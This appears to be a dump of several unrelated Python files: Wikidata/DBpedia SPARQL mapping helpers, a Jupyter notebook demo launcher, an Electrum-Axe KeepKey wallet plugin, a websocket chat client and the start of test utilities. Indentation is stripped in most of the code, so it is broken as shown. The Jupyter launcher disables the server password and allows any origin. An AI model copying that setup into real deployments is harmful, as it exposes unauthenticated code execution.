q = q.replace('STR_TO_SUB', s).replace('?p', p).replace('<FILTER>', filter_q)
URL = getRequestURL(q, endpointURL='https://query.wikidata.org/sparql')
try:
text = getRequestResult_and_Read(URL)
except:
print(URL)
text = getRequestResult_and_Read(URL)
df = fromXMLtoDataFrame(text)
return df
def fromDbpediaToWikidataUri(db_uris, query=q_db_wd_sameAs):
db_uris = list(db_uris)
queries = getQueries(db_uris, query, offset=20)
URLs = [getRequestURL(q, endpointURL='http://dbpedia.org/sparql') for q in queries]
results = getQueriesResults(URLs)
mapping_db_en_wd = pd.concat([pd.read_csv(r) for r in results]).reset_index(drop=True)
return mapping_db_en_wd
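# Example usage sketch (hypothetical URIs): the owl:sameAs lookup above returns a
# DataFrame with 'db_uri' and 'wd_uri' columns, e.g.
#   fromDbpediaToWikidataUri(['http://dbpedia.org/resource/Paris',
#                             'http://dbpedia.org/resource/Lyon'])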
def fromWikidataToDbpediaUri(wd_uris, query=q_wd_db_sameAs):
wd_uris = list(wd_uris)
queries = getQueries(wd_uris, query, offset=20)
URLs = [getRequestURL(q, endpointURL='http://dbpedia.org/sparql') for q in queries]
results = getQueriesResults(URLs)
mapping_db_en_wd = pd.concat([pd.read_csv(r) for r in results]).reset_index(drop=True)
return mapping_db_en_wd
def fromFrenchDbpediatoEnglishDbpedia(db_uris, query=dbfr_db_sameAS):
db_uris = list(db_uris)
queries = getQueries(db_uris, query, offset=20)
URLs = [getRequestURL(q) for q in queries]
results = getQueriesResults(URLs)
mapping_db_fr_en = pd.concat([pd.read_csv(r) for r in results]).reset_index(drop=True)
return mapping_db_fr_en
def fromFrenchDbpediatoWikipedia(db_uris, query=dbfr_wiki_isPrimaryTopic):
db_uris = list(db_uris)
queries = getQueries(db_uris, query, offset=20)
URLs = [getRequestURL(q) for q in queries]
results = getQueriesResults(URLs)
mapping_db_fr_wiki = pd.concat([pd.read_csv(r) for r in results]).reset_index(drop=True)
return mapping_db_fr_wiki
def workerRequestWiki(q1, q2, url_wikidpedia_to_wikidataid=url_wikidpedia_to_wikidataid):
while not q1.empty():
w = q1.get()
base, title = w.split("/wiki/")
URL = base + url_wikidpedia_to_wikidataid.replace('<TITLE>', urllib.parse.quote(title))
res = getRequestResult(URL)
wd_uri = ''
content = res.read()
if type(content) != str:
content = content.decode('utf8')
try:
obj = json.loads(content)['query']['pages']
except:
print(content)
raise Exception
for k in obj:
try:
int(k)
wd_uri = obj[k]['pageprops']['wikibase_item']
except:
pass
if wd_uri != '':
record = {
'wiki_uri': w,
'wd_uri': wd_uri
}
q2.put(record)
q1.task_done()
def getQueriesResultsWiki(items, num_threads=4):
q1 = Queue(maxsize=0)
q2 = Queue()
for item in items:
q1.put(item)
for i in range(num_threads):
worker = Thread(target=workerRequestWiki, args=(q1, q2))
worker.setDaemon(True)
worker.start()
q1.join()
return list(q2.queue)
def fromWikipediatoWikidata(wp_uris, url_wikidpedia_to_wikidataid=url_wikidpedia_to_wikidataid):
records = getQueriesResultsWiki(wp_uris)
return pd.DataFrame(records)
def getDisambiguationListTuple(db_uris, endpointURL='http://fr.dbpedia.org/sparql', query=dbfr_wiki_isDisambiguation):
db_uris = list(db_uris)
queries = getQueries(db_uris, query, offset=20)
URLs = [getRequestURL(q, endpointURL) for q in queries]
results = getQueriesResults(URLs)
mapping_disambiguation = pd.concat([pd.read_csv(r) for r in results]).reset_index(drop=True)
return mapping_disambiguation
def getWikiMissingInfo(wikipage, endpointURL='http://dbpedia.org/sparql'):
title = wikipage.split('/')[-1]
wikistring = wikipage.replace("http:/", "https:/").replace(title, urllib.parse.quote(title))
base_query = 'define sql:describe-mode "CBD" DESCRIBE <STR_TO_SUB>'
query = base_query.replace("STR_TO_SUB", wikistring)
escapedQuery = urllib.parse.quote(query)
requestURL = endpointURL + "?query=" + escapedQuery + "&output=text/csv"
try:
request = urllib.request.Request(requestURL)
result = urllib.request.urlopen(request)
return result
except:
raise Exception
def setWikidataUrisfromDbpedia_fr(annotations_pd):
db_fr_uris = set(annotations_pd['uri'])
mapping_disambiguation = getDisambiguationListTuple(db_fr_uris).to_dict(orient='records')
for m in mapping_disambiguation:
annotations_pd.loc[annotations_pd['uri'] == m['db_fr_uri'], 'uri'] = m['db_fr_uri_disambiguation']
db_fr_uris = set(annotations_pd['uri'])
mapping_db_fr_wiki = fromFrenchDbpediatoWikipedia(db_fr_uris)
matched_wiki = set(mapping_db_fr_wiki["db_fr_uri"])
wiki_uris = set(mapping_db_fr_wiki["wiki_uri"])
mapping_wiki_wd = fromWikipediatoWikidata(wiki_uris)
matched_wd = set(mapping_wiki_wd["wiki_uri"])
for uri in wiki_uris - matched_wd:
df = pd.read_csv(getWikiMissingInfo(uri))
if len(df) > 0:
lines_df = df[df['predicate'] == 'http://schema.org/about'][['subject', 'object']]
lines_df.columns = list(mapping_wiki_wd.columns)
mapping_wiki_wd = mapping_wiki_wd.append(lines_df, ignore_index=True)
mapping_db_fr_wd = (
pd.merge(
mapping_db_fr_wiki,
mapping_wiki_wd,
on='wiki_uri',
how='inner')
[['db_fr_uri', 'wd_uri']]
)
def getWikidataAssociatedUri(uri):
try:
return list(mapping_db_fr_wd[mapping_db_fr_wd['db_fr_uri'] == uri]['wd_uri'])[0].split('/')[-1]
except:
return np.NAN
annotations_pd['uri'] = annotations_pd['uri'].apply(
lambda uri: getWikidataAssociatedUri(uri)
)
return annotations_pd[~annotations_pd['uri'].isnull()]
def setWikidataUrisfromDbpedia_en(annotations_pd, name_col='uri'):
db_en_uris = set(annotations_pd[name_col])
mapping_disambiguation = getDisambiguationListTuple(db_en_uris,
endpointURL='http://dbpedia.org/sparql',
query=dben_wiki_isDisambiguation
).to_dict(orient='records')
for m in mapping_disambiguation:
annotations_pd.loc[annotations_pd[name_col] == m['db_en_uri'], name_col] = m['db_en_uri_disambiguation']
db_en_uris = set(annotations_pd[name_col])
mapping_db_en_wd = fromDbpediaToWikidataUri(db_en_uris)
def getWikidataAssociatedUri(uri):
try:
return list(mapping_db_en_wd[mapping_db_en_wd['db_uri'] == uri]['wd_uri'])[0].split('/')[-1]
except:
return np.NAN
annotations_pd['uri'] = annotations_pd[name_col].apply(
lambda uri: getWikidataAssociatedUri(uri)
)
return annotations_pd[~annotations_pd['uri'].isnull()]
def setWikidataUris_Babelfy(annotations_pd):
db_en_uris = set(annotations_pd['uri'])
mapping_disambiguation = getDisambiguationListTuple(db_en_uris,
endpointURL='http://dbpedia.org/sparql',
query=dben_wiki_isDisambiguation
).to_dict(orient='records')
for m in mapping_disambiguation:
        annotations_pd.loc[annotations_pd['uri'] == m['db_en_uri'], 'uri'] = m['db_en_uri_disambiguation']
db_en_uris = set(annotations_pd['uri'])
mapping_db_en_wd = fromDbpediaToWikidataUri(db_en_uris)
    matched_wd = set(mapping_db_en_wd["db_uri"])
recall_wd = (len(matched_wd) / len(db_en_uris))
print("Recall_wd:", recall_wd * 100, '%')
def getWikidataAssociatedUri(r):
try:
wd_uri = list(mapping_db_en_wd[mapping_db_en_wd['db_uri'] == r]['wd_uri'])[0]
identifier = wd_uri.split('/')[-1]
return identifier
except:
return ''
annotations_pd['wd_uri'] = annotations_pd['uri'].apply(
lambda r: getWikidataAssociatedUri(r)
)
return annotations_pd
def getRequestURL(query, endpointURL='http://fr.dbpedia.org/sparql', q=False):
escapedQuery = urllib.parse.quote(query)
requestURL = endpointURL + "?query=" + escapedQuery + "&output=text/csv&timeout=10000000"
if q:
return requestURL, query
else:
return requestURL
def getRequestResult(requestURL):
request = urllib.request.Request(requestURL)
result = urllib.request.urlopen(request)
return result
def getRequestResult_and_Read(requestURL):
result = getRequestResult(requestURL)
text = result.read().decode("utf-8")
return text
def workerRequest(q1, q2):
while not q1.empty():
URL = q1.get()
res = getRequestResult(URL)
q2.put(res)
q1.task_done()
def fromXMLtoDataFrame(sstr):
obj_list = list()
rex_column_names = re.compile(r"<variable name='(.*?)'")
column_names = re.findall(rex_column_names, sstr)
rex = re.compile(r'<result.*?>(.*?)</result>', re.S | re.M)
results = re.findall(rex, sstr)
flag = False
for j, res in enumerate(results):
obj = {}
if flag:
print(j)
flag = False
for c in column_names:
rex = re.compile(r"<binding name='" + c + "'>\n\t\t\t\t<.*?>(.*?)</.*?>\n\t\t\t</binding>", re.S | re.M)
obj[c] = re.findall(rex, res)[0]
try:
obj_list.append(obj)
except:
print(results)
print("No item")
            print(rex)
raise Exception
flag = True
if len(obj_list) > 0:
return pd.DataFrame(obj_list)
else:
return pd.DataFrame(data=[], columns=column_names)
def getQueriesResults(URLs, num_threads=4):
q1 = Queue(maxsize=0)
q2 = Queue()
for url in URLs:
q1.put(url)
for i in range(num_threads):
worker = Thread(target=workerRequest, args=(q1, q2))
worker.setDaemon(True)
worker.start()
q1.join()
return list(q2.queue)
def getQueries(strs, query, offset=10, replaceHTTP=False, flag_string=False, flag_print=False):
queries = []
linked_strings = []
for i in range(0, len(strs), offset):
if flag_print and i % 10000 == 0:
print(i)
if replaceHTTP:
qr = ex_query.replace("STR_TO_SUB",
"\nUNION\n".join(
['{' + query.replace("STR_TO_SUB", s.replace("http:/", "https:/")) + '}'
for s in strs[i:i + offset]
if type(s) != float]))
else:
qr = ex_query.replace("STR_TO_SUB",
"\nUNION\n".join(
['{' + query.replace("STR_TO_SUB", s) + '}' for s in strs[i:i + offset]
if type(s) != float]))
queries.append(qr)
linked_strings.append([s for s in strs[i:i + offset]])
if flag_string:
return queries, linked_strings
return queries
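# Batching sketch (illustrative URIs): with offset=2 and query=q_db_wd_sameAs,
# getQueries wraps each batch of URIs into a single UNION query built on ex_query:
#
#   select *{
#       {select ?db_uri ?wd_uri where{ values ?db_uri { <http://dbpedia.org/resource/A> } ... }}
#       UNION
#       {select ?db_uri ?wd_uri where{ values ?db_uri { <http://dbpedia.org/resource/B> } ... }}
#   }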
|
main.py
|
"""
An example demonstrating a stand-alone "notebook".
Copyright (c) Jupyter Development Team.
Distributed under the terms of the Modified BSD License.
Example
-------
To run the example, see the instructions in the README to build it. Then
run ``python main.py`` and navigate your browser to ``localhost:8765``.
Note
----
This file provides the Python code for interacting with the Jupyter notebook
server using ``ZMQ`` and the ``tornado`` web server.
"""
import re
import subprocess
import sys
import threading
import tornado.web
# Install the pyzmq ioloop. Must be done after importing tornado.web and
# before importing any additional tornado modules
from zmq.eventloop import ioloop
ioloop.install()
PORT = 8765
"""int: Port number of web application"""
class MainPageHandler(tornado.web.RequestHandler):
"""Handle requests between the main app page and notebook server."""
def initialize(self, base_url):
"""Intitialize the base URL of the handler."""
self.base_url = base_url
def get(self):
"""Get the main page for the application's interface."""
return self.render("index.html", static=self.static_url,
base_url=self.base_url)
def main(argv):
"""Start the 'notebook' example.
- Start the Tornado main event loop for the Jupyter notebook server
- Set up the main page event handler for the 'notebook' example
"""
nb_command = [sys.executable, '-m', 'notebook', '--no-browser',
'--debug',
# FIXME: allow-origin=* only required for notebook < 4.3
'--NotebookApp.allow_origin="*"',
# disable user password:
'--NotebookApp.password=',
]
nb_server = subprocess.Popen(nb_command, stderr=subprocess.STDOUT,
stdout=subprocess.PIPE)
# Wait for Jupyter notebook server to complete start up
while 1:
line = nb_server.stdout.readline().decode('utf-8').strip()
if not line:
continue
print(line)
if 'Jupyter Notebook is running at:' in line:
base_url = re.search(r'(http[^\?]+)', line).groups()[0]
break
while 1:
line = nb_server.stdout.readline().decode('utf-8').strip()
if not line:
continue
print(line)
if 'Control-C' in line:
break
def print_thread():
while 1:
line = nb_server.stdout.readline().decode('utf-8').strip()
if not line:
continue
print(line)
thread = threading.Thread(target=print_thread)
thread.setDaemon(True)
thread.start()
handlers = [
(r"/", MainPageHandler, {'base_url': base_url}),
(r'/(.*)', tornado.web.StaticFileHandler, {'path': '.'}),
]
app = tornado.web.Application(handlers, static_path='build',
template_path='.',
compiled_template_cache=False)
app.listen(PORT, 'localhost')
# For Windows, add no-op to wake every 5 seconds (5000 ms) to handle
# signals that may be ignored by the Tornado main event loop
if sys.platform.startswith('win'):
pc = ioloop.PeriodicCallback(lambda: None, 5000)
pc.start()
loop = ioloop.IOLoop.current()
print('Browse to http://localhost:%s' % PORT)
try:
# Start the Tornado main event loop
loop.start()
except KeyboardInterrupt:
print(" Shutting down on SIGINT")
finally:
nb_server.kill()
loop.close()
if __name__ == '__main__':
main(sys.argv)
|
keepkey.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum_axe.util import bfh, bh2u, UserCancelled, UserFacingException
from electrum_axe.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT
from electrum_axe.bip32 import BIP32Node
from electrum_axe import constants
from electrum_axe.axe_tx import to_varbytes, serialize_extra_payload
from electrum_axe.i18n import _
from electrum_axe.transaction import deserialize, Transaction
from electrum_axe.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum_axe.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKey_KeyStore(Hardware_KeyStore):
hw_type = 'keepkey'
device = 'KeepKey'
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None:
raise UserFacingException(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class KeepKeyPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
firmware_URL = 'https://www.keepkey.com'
libraries_URL = 'https://github.com/keepkey/python-keepkey'
minimum_firmware = (1, 0, 0)
keystore_class = KeepKey_KeyStore
SUPPORTED_XTYPES = ('standard', )
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
from . import client
import keepkeylib
import keepkeylib.ckd_public
import keepkeylib.transport_hid
import keepkeylib.transport_webusb
self.client_class = client.KeepKeyClient
self.ckd_public = keepkeylib.ckd_public
self.types = keepkeylib.client.types
self.DEVICE_IDS = (keepkeylib.transport_hid.DEVICE_IDS +
keepkeylib.transport_webusb.DEVICE_IDS)
self.device_manager().register_devices(self.DEVICE_IDS)
self.libraries_available = True
except ImportError:
self.libraries_available = False
def hid_transport(self, pair):
from keepkeylib.transport_hid import HidTransport
return HidTransport(pair)
def webusb_transport(self, device):
from keepkeylib.transport_webusb import WebUsbTransport
for d in WebUsbTransport.enumerate():
if device.id_.startswith(d.getSerialNumber()):
return WebUsbTransport(d)
return WebUsbTransport(device)
def _try_hid(self, device):
self.logger.info("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.logger.info(f"cannot connect at {device.path} {e}")
return None
def _try_webusb(self, device):
self.logger.info("Trying to connect over WebUSB...")
try:
return self.webusb_transport(device)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
def create_client(self, device, handler):
if device.product_key[1] == 2:
transport = self._try_webusb(device)
else:
transport = self._try_hid(device)
if not transport:
self.logger.info("cannot connect to device")
return
self.logger.info(f"connected to device at {device.path}")
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.logger.info(f"ping failed {e}")
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.logger.info(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Axe Testnet" if constants.net.TESTNET else "Axe"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = self.types.HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_keepkey_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2pkh', ):
return self.types.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_keepkey_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2pkh', ):
return self.types.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
return self._make_node_path(xpub, [change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
txinputtype.script_type = self.get_keepkey_input_script_type(txin['type'])
else:
def f(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
return self._make_node_path(xpub, s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[bfh(x)[:-1] if x else b'' for x in txin.get('signatures')],
m=txin.get('num_sig'),
)
script_type = self.get_keepkey_input_script_type(txin['type'])
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
def create_output_by_derivation():
script_type = self.get_keepkey_output_script_type(info.script_type)
if len(xpubs) == 1:
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
address_n = self.client_class.expand_path("/%d/%d" % index)
pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address is allowed
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for vout in d['outputs']:
o = t.bin_outputs.add()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
if t.version > 2:
tx_type = d['tx_type']
if tx_type:
t.extra_data = to_varbytes(serialize_extra_payload(tx))
t.version |= tx_type << 16
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
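# Illustrative sketch (not part of the original plugin): how electrum_tx_to_txtype()
# above packs a DIP2 special-transaction type into the 32-bit version field. Only the
# "version | (tx_type << 16)" packing mirrors the code above; the helper name and the
# example values are hypothetical.
def _pack_special_tx_version(version: int, tx_type: int) -> int:
    # Low 16 bits keep the plain version, high 16 bits carry the tx_type.
    return (version & 0xFFFF) | (tx_type << 16)
# e.g. _pack_special_tx_version(3, 5) == 0x00050003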
|
main.py
|
# -*- coding: utf-8 -*-
"""
Onyx Project
https://onyxlabs.fr
Software under licence Creative Commons 3.0 France
http://creativecommons.org/licenses/by-nc-sa/3.0/fr/
You may not use this software for commercial purposes.
@author :: Cassim Khouani
"""
import onyx, sys, os, time
import threading
from threading import Thread
from onyx.utils.log import getLogger
from onyx.sockyx.client.ws import WebsocketClient
from onyx.sockyx.message import Message
global ws
LOG = getLogger('Client')
def handle_speak(event):
utterance = event.data.get('utterance')
print(">> " + utterance)
def handle_test(event):
print(event.data['utterances'][0])
def handle_finish(event):
print("Finish")
def connect():
# Once the websocket has connected, just watch it for speak events
ws.run_forever()
ws = WebsocketClient()
ws.on('speak', handle_speak)
ws.on('onyx_recognizer:utterance', handle_test)
ws.on('finish', handle_finish)
event_thread = Thread(target=connect)
event_thread.daemon = True
event_thread.start()
def cli():
while True:
try:
time.sleep(1.5)
result = input('You: ')
print ("Sending message...")
payload = {
'utterances': [result]
}
ws.emit(Message('onyx_recognizer:utterance', payload))
ws.emit(Message('speak', result))
except (KeyboardInterrupt, EOFError, SystemExit):
break
if __name__ == "__main__":
cli()
|
utils.py
|
import datetime
import errno
import json
import os
import sys
import time
from binascii import hexlify
from threading import Event, Thread
from typing import List
from unittest import TestCase
from unittest.mock import patch
import jupyter_core.paths
import requests
from ipython_genutils.tempdir import TemporaryDirectory
from tornado.ioloop import IOLoop
from traitlets.config import Config
from mamba_gator.handlers import NS
# Shim for notebook server or jupyter_server
#
# Provides:
# - ServerTestBase
# - assert_http_error
# - url_escape
# - url_path_join
try:
from notebook.tests.launchnotebook import (
assert_http_error,
NotebookTestBase as ServerTestBase,
)
from notebook.utils import url_escape, url_path_join
from notebook.notebookapp import NotebookApp as ServerApp
except ImportError:
from jupyter_server.tests.launchnotebook import assert_http_error # noqa
from jupyter_server.tests.launchserver import ServerTestBase # noqa
from jupyter_server.utils import url_escape, url_path_join # noqa
from jupyter_server.serverapp import ServerApp # noqa
TIMEOUT = 150
SLEEP = 1
class APITester(object):
"""Wrapper for REST API requests"""
url = "/"
def __init__(self, request):
self.request = request
def _req(self, verb: str, path: List[str], body=None, params=None):
if body is not None:
body = json.dumps(body)
response = self.request(
verb, url_path_join(self.url, *path), data=body, params=params
)
if 400 <= response.status_code < 600:
try:
response.reason = response.json()["message"]
except Exception:
pass
response.raise_for_status()
return response
class JupyterCondaAPI(APITester):
"""Wrapper for nbconvert API calls."""
url = NS
def delete(self, path: List[str], body=None, params=None):
return self._req("DELETE", path, body, params)
def get(self, path: List[str], body=None, params=None):
return self._req("GET", path, body, params)
def patch(self, path: List[str], body=None, params=None):
return self._req("PATCH", path, body, params)
def post(self, path: List[str], body=None, params=None):
return self._req("POST", path, body, params)
def envs(self):
return self.get(["environments"]).json()
class ServerTest(ServerTestBase):
# Force extension enabling - Disabled by parent class otherwise
config = Config({"NotebookApp": {"nbserver_extensions": {"mamba_gator": True}}})
@classmethod
def setup_class(cls):
# Copy paste from https://github.com/jupyter/notebook/blob/6.0.0/notebook/tests/launchnotebook.py
# Only to suppress setting PYTHONPATH with sys.path
